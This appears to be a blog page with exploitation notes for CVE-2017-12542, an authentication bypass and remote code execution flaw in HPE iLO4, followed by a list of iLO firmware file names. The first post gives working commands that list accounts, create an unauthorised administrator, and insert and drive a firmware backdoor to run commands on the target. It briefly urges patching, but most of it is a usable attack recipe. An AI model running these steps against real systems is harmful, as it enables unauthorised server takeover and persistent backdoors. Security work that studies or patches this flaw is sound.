Category: HPE

HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

This shows just a few notes for exploiting CVE-2017-12542.  I am currently looking at various RCE’s and backdoors available for different iLO versions and will hopefully do more articles soon.

How to list user accounts on HPE iLO 4
If you just need to list user accounts on the HPE iLO, you can use the following python script //github.com/skelsec/CVE-2017-12542 or Metasploit module (//www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account)

$ git clone //github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

How to create a new user on HPE iLO 4
Should you want to create a new account on the HPE iLO, you can use the same script as above from //github.com/skelsec/CVE-2017-12542 or Metasploit module (//www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account)

$ git clone //github.com/skelsec/CVE-2017-12542 $ cd CVE-2017-12542
$ python exploit_1.py -u newadmin -p newadmin x.x.x.x

RCE on the HPE iLO
The Backdoor can be located at //github.com/airbus-seclab/ilo4_toolbox/tree/master/scripts/iLO4 and following HPE’s advisory it looks like all versions prior to version 2.53 for iLO4 are effected, as such if you are useing an old version in the corporate environment then you please consider upgrading the firwmware to version xx which can be obtained directly from HPE via this link to ver 2.60(30 May 2018).

Steps on how to get command execution on HP iLO and extract passwords

$ git clone //github.com/airbus-seclab/ilo4_toolbox
$ curl -s -k  //x.x.x.x/xmldata?item=all | grep -i “<FWRI>”
<FWRI>2.5.3</FWRI>

$ wget //downloads.hpe.com/pub/softlib2/software1/sc-linux-fw-ilo/p192122427/v129421/CP032487.scexe

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe –unpack=/tmp/iLO

$ cd ilo4_toolbox/scripts/iLO4/

$ ./insert_backdoor.sh ilo4_253.bin

$ python backdoor_client.py x.x.x.x

ib.install_linux_backdoor()
ib.cmd(“/usr/bin/id”)
ib.remove_linux_backdoor()

 

HPE iLO Firmware Download Links

HPE iLO Firmware Download Links

**Updated 23/07/2018**

 

Using the links below you can download the recent HPE iLO (Integrated Lights-Out) firmware files (to get to the .bin file you will need to extract the .exe with 7zip and then install via the iLO webpage, or run the .exe on the server itself),these are all i could find on HPE’s website :

  1. iLO1 Latest : ilo196.bin (30-Apr-2014)
  2. iLO2 Latest : ilo2_232.bin (18-Feb-2018)
  3. iLO3 Latest : ilo3_189.bin (07-Jul-2017)
  4. iLO4 Latest :  ilo4_260.bin (23-May-2018)
  5. iLO5 Latest :  ilo5_130.bin (4-Jun-2018)

ILO1:
ilo187.bin
ilo188.bin
ilo189.bin
ilo191.bin
ilo192.bin
ilo193.bin
ilo194.bin
ilo195.bin

 

ILO2:
ilo2_120.bin
ilo2_122.bin
ilo2_124.bin
ilo2_126.bin
ilo2_129.bin
ilo2_130.bin
ilo2_135.bin
ilo2_140.bin
ilo2_142.bin
ilo2_143.bin
ilo2_150.bin
ilo2_160.bin
ilo2_161.bin
ilo2_170.bin
ilo2_175.bin
ilo2_177.bin
ilo2_178.bin
ilo2_179.bin
ilo2_180.bin
ilo2_181.bin
ilo2_182.bin
ilo2_183.bin
ilo2_201.bin
ilo2_205.bin
ilo2_206.bin
ilo2_207.bin
ilo2_208.bin
ilo2_209.bin
ilo2_212.bin
ilo2_213.bin
ilo2_215.bin
ilo2_220.bin
ilo2_222.bin
ilo2_223.bin
ilo2_225.bin
ilo2_227.bin
ilo2_228.bin
ilo2_229.bin
ilo2_230.bin
ilo2_231.bin

 

ILO3:
ilo3_187.bin
ilo3_100.bin
ilo3_105.bin
ilo3_110.bin
ilo3_115.bin
ilo3_116.bin
ilo3_120.bin
ilo3_126.bin
ilo3_128.bin
ilo3_150.bin
ilo3_155.bin
ilo3_157.bin
ilo3_161.bin
ilo3_165.bin
ilo3_170.bin
ilo3_180.bin
ilo3_182.bin
ilo3_185.bin
ilo3_187.bin
ilo3_188.bin

 

ILO4:
ilo4_101.bin
ilo4_105.bin
ilo4_110.bin
ilo4_113.bin
ilo4_120.bin
ilo4_122.bin
ilo4_130.bin
ilo4_132.bin
ilo4_140.bin
ilo4_150.bin
ilo4_151.bin
ilo4_153.bin
ilo4_200.bin
ilo4_202.bin
ilo4_203.bin
ilo4_210.bin
ilo4_211.bin
ilo4_220.bin
ilo4_222.bin
ilo4_230.bin
ilo4_231.bin
ilo4_240.bin
ilo4_242.bin
ilo4_244.bin
ilo4_250.bin
ilo4_253.bin
ilo4_254.bin

ilo4_255.bin

 

ILO5:
ilo5_117.bin

ilo5_120.bin